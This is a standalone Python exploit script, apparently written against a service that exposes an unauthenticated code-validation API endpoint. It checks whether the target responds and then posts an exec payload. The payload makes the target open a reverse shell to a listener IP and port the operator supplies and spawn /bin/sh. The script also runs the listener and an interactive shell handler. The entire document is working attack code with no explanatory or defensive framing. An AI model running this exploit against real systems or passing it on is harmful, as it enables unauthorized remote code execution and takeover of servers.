import argparse import requests import socket import threading import time import select import sys def check_vulnerable(ip, port): url = f"http://{ip}:{port}/api/v1/validate/code" try: r = requests.head(url, timeout=5) return r.status_code == 200 except: return False def send_payload(ip, port, listener_ip, listener_port): url = f"http://{ip}:{port}/api/v1/validate/code" headers = {"Content-Type": "application/json"} payload_code = ( f'@exec("import socket,os,pty;' f's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' f's.connect((\\\"{listener_ip}\\\",{listener_port}));' f'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' f'pty.spawn(\\\"/bin/sh\\\")")\n' f'def foo():\n pass' ) data = {"code": payload_code} try: requests.post(url, json=data, headers=headers, timeout=5) except: pass def handle_shell(client_socket): try: while True: read_ready, _, _ = select.select([client_socket, sys.stdin], [], []) for sock in read_ready: if sock == client_socket: data = client_socket.recv(4096) if not data: print("\n[*] Connection closed by target.") return print(data.decode(errors="ignore"), end='', flush=True) else: cmd = input() if cmd.strip().lower() == "exit": print("[*] Exiting shell.") return client_socket.sendall(cmd.encode() + b"\n") except KeyboardInterrupt: print("\n[!] Exiting shell.") finally: client_socket.close() def start_listener(ip, port): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: server.bind((ip, port)) server.listen(1) print(f"[+] Listening on {ip}:{port}") client, addr = server.accept() print(f"[+] Connection from {addr[0]}:{addr[1]}") handle_shell(client) except KeyboardInterrupt: print("\n[!] Listener interrupted.") finally: server.close() def main(): parser = argparse.ArgumentParser() parser.add_argument("-i", required=True, help="Target IP") parser.add_argument("-p", required=True, type=int, help="Target port") parser.add_argument("-l", required=True, help="Your listener IP") parser.add_argument("-lp", required=True, type=int, help="Your listener port") args = parser.parse_args() if not check_vulnerable(args.i, args.p): print("[-] Doesn't look vulnerable") return print(f"[+] Vulnerability detected at http://{args.i}:{args.p}/api/v1/validate/code") listener_thread = threading.Thread(target=start_listener, args=(args.l, args.lp)) listener_thread.start() time.sleep(2) print(f"[+] Sending payload to http://{args.i}:{args.p}/api/v1/validate/code") send_payload(args.i, args.p, args.l, args.lp) listener_thread.join() if __name__ == "__main__": main()